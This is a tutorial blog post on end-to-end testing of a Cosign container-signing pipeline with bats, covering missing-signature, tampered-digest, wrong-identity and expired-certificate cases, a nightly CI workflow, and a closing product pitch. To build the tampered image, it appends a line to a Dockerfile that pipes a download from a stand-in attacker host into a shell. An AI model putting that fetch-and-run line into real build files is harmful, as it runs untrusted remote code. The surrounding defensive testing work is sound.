DevSecOps

How to Test Your Signing Pipeline End to End

Build a repeatable end-to-end test harness for your signing pipeline that proves artifacts are signed correctly and that verification fails when tampered.

Shadab Khan
Security Engineer
6 min read

A signing pipeline that has never been tested in anger is a signing pipeline that will fail the first time you need it. Most teams test that sign succeeds, which is necessary but not sufficient. The real test is whether verification fails when an artifact is tampered with or when a signature is missing. This tutorial walks through a test harness that exercises your Cosign-based pipeline across five scenarios: valid signature, missing signature, tampered digest, wrong identity, and expired certificate. You will finish with a reusable script that runs nightly and alerts when any scenario behaves unexpectedly.

Prerequisites: cosign 2.2.0+, access to your CI system, a container registry, and bats 1.10+ for structured test output. Time to complete: About 2 hours.

Why test verification failures and not just sign success?

Verification has two failure modes: false positive and false negative. A false positive is "verification passes on an artifact that should have been rejected." A false negative is "verification fails on an artifact that should have been accepted." False positives are security incidents; false negatives are reliability incidents. Both are bad, but false positives are what allow compromised artifacts to reach production, so they are what your test harness must catch.

The industry term for this is "destructive testing": deliberately produce an artifact that violates the policy and confirm that verification rejects it. If your pipeline never sees a violating artifact, your verification code has never actually been exercised, and you cannot claim confidence in it.

How do I structure the test harness?

Organize the harness as a set of bash test cases under bats, one per scenario. Each case builds a test artifact, runs the pipeline step under test, and asserts the expected outcome:

# signing_pipeline.bats
setup() {
  export TEST_IMG="ghcr.io/acme/sig-test:${BATS_TEST_NAME}"
  export IDENTITY_REGEX="^https://github.com/acme/.+/release.yml@refs/tags/.*$"
  export ISSUER="https://token.actions.githubusercontent.com"
}

@test "valid signature verifies" {
  run cosign verify "${TEST_IMG}" \
    --certificate-identity-regexp "${IDENTITY_REGEX}" \
    --certificate-oidc-issuer "${ISSUER}"
  [ "${status}" -eq 0 ]
}

@test "missing signature fails verification" {
  run cosign verify "${TEST_IMG}-unsigned" \
    --certificate-identity-regexp "${IDENTITY_REGEX}" \
    --certificate-oidc-issuer "${ISSUER}"
  [ "${status}" -ne 0 ]
  [[ "${output}" == *"no matching signatures"* ]]
}

Run with bats signing_pipeline.bats. Each test emits ok or not ok with a line number, which is a clean format for CI to ingest.

How do I produce a tampered artifact for negative tests?

Build two images that differ only in content, sign the first, and then swap the signature onto the second. The goal is to simulate what an attacker would do if they compromised the registry:

# Build and sign the "good" image
docker build -t ghcr.io/acme/sig-test:good .
GOOD_DIGEST=$(docker push ghcr.io/acme/sig-test:good 2>&1 | grep -oP 'digest: \Ksha256:[a-f0-9]+')
cosign sign --key awskms:///alias/cosign-signer -y \
  "ghcr.io/acme/sig-test@${GOOD_DIGEST}"

# Build a malicious image
echo "RUN curl -sL https://evil.example | sh" >> Dockerfile
docker build -t ghcr.io/acme/sig-test:tampered .
TAMPERED_DIGEST=$(docker push ghcr.io/acme/sig-test:tampered 2>&1 | grep -oP 'digest: \Ksha256:[a-f0-9]+')

# Attempt verification of the tampered image with the good signature tag
cosign verify "ghcr.io/acme/sig-test@${TAMPERED_DIGEST}" \
  --certificate-identity-regexp "${IDENTITY_REGEX}" \
  --certificate-oidc-issuer "${ISSUER}"

Expected output:

Error: no matching signatures:
signature digest did not match image digest

The digest mismatch is what Cosign is designed to catch, and it is exactly what your harness must confirm.

How do I test the wrong-identity scenario?

Sign an image from a workflow that does not match your identity policy and verify that policy rejects it. This exercises the keyless identity check, which is often where misconfiguration hides:

# In a test-only workflow file .github/workflows/negative-sig-test.yml
# triggered manually, not on tag
on: workflow_dispatch
jobs:
  negative-sign:
    permissions:
      id-token: write
    steps:
      - uses: sigstore/cosign-installer@v3.4.0
      - run: |
          cosign sign -y ghcr.io/acme/sig-test:wrong-identity

After running that workflow, test verification against the production identity regex:

cosign verify ghcr.io/acme/sig-test:wrong-identity \
  --certificate-identity-regexp "^https://github.com/acme/.+/release.yml@refs/tags/.*$" \
  --certificate-oidc-issuer https://token.actions.githubusercontent.com

Expected failure:

Error: no matching signatures:
none of the expected identities matched what was in the certificate, got subjects: [https://github.com/acme/app/.github/workflows/negative-sig-test.yml@refs/heads/main]

That error is gold. It proves your identity policy is narrower than the set of workflows that can produce signatures, which is what you want.

How do I test certificate expiration?

Fulcio issues short-lived certificates, typically valid for 10 minutes. You cannot easily fake expiration, but you can pin a Rekor entry from months ago and demonstrate verification still works against the Rekor transparency log. Use cosign verify --offline with a stored bundle:

cosign sign --bundle sig.bundle --key awskms:///alias/cosign-signer -y ghcr.io/acme/sig-test:old
# Wait some time, then:
cosign verify --offline --bundle sig.bundle ghcr.io/acme/sig-test:old \
  --certificate-identity-regexp "${IDENTITY_REGEX}" \
  --certificate-oidc-issuer "${ISSUER}"

The test passes because Rekor's inclusion proof confirms the signature was valid at the time it was created, even though the leaf certificate has since expired. This is an important property to exercise: without it, any long-lived release would become unverifiable.

How do I run this nightly and alert on failures?

Add a scheduled workflow that runs the whole bats suite against a dedicated test registry path:

name: Nightly Signing Harness
on:
  schedule:
    - cron: '0 6 * * *'
  workflow_dispatch:
jobs:
  harness:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      packages: write
    steps:
      - uses: actions/checkout@v4
      - uses: sigstore/cosign-installer@v3.4.0
      - name: Install bats
        run: sudo apt-get update && sudo apt-get install -y bats
      - name: Run harness
        run: bats tests/signing_pipeline.bats
      - name: Alert on failure
        if: failure()
        uses: slackapi/slack-github-action@v1.26.0
        with:
          slack-message: "Signing harness FAILED on ${{ github.ref }}"
          channel-id: C012345
        env:
          SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}

The nightly schedule catches drift: a new Cosign release that changes verification behavior, a KMS key policy change that silently broke signing, or a CA bundle rotation that your airgap cluster missed. The harness is cheap to run and pays for itself the first time it catches one of these.

What should I keep in the harness as it grows?

Add one scenario per class of bug you find in production. If a customer reports that a verification worked when it should have failed, write a harness test that reproduces the situation and keep it forever. The harness becomes the living documentation of what your signing pipeline actually does, as opposed to what you think it does. Five good tests are better than fifty that all exercise the same happy path.

How Safeguard Helps

Safeguard runs signing-pipeline health checks continuously across every product in your tenant, not just on a nightly cron. Griffin AI correlates signing failures with the underlying change (a workflow file edit, a KMS policy change, a CA rotation) so the alert arrives with a plausible cause attached. SBOMs for each release carry attestation status alongside component data, which means a missing signature is as visible as a missing component. Policy gates block the release of any artifact that fails the harness criteria, making the test suite part of the deploy path rather than a separate nightly job that sometimes nobody watches.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.